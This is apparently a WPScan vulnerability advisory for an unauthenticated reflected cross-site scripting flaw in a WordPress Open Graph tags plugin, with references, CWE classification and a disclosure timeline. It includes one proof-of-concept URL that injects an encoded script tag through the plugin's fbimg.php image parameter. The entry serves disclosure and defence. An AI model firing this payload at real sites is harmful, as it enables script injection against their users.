Open Graph for Facebook, Google+ and Twitter Card Tags <= 2.2.4.1 - Unauthenticated Cross-Site Scripting (XSS)



Proof of Concept
http://blog.tld/wp-content/plugins/wonderm00ns-simple-facebook-open-graph-tags/fbimg.php/?img=http://blog.tld/%3c%73%63%72%69%70%74%3ealert(document.domain)%3c%2f%73%63%72%69%70%74%3e

Affects Plugin

References

URL https://plugins.trac.wordpress.org/browser/wonderm00ns-simple-facebook-open-graph-tags/trunk/fbimg.php?rev=1899976
URL https://plugins.trac.wordpress.org/changeset/1899975/wonderm00ns-simple-facebook-open-graph-tags

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Thomas Chauchefoin
Views 2032
Verified No
WPVDB ID 9103

Timeline

Publicly Published 2018-06-27 (6 months ago)
Added 2018-07-04 (5 months ago)
Last Updated 2018-07-04 (5 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.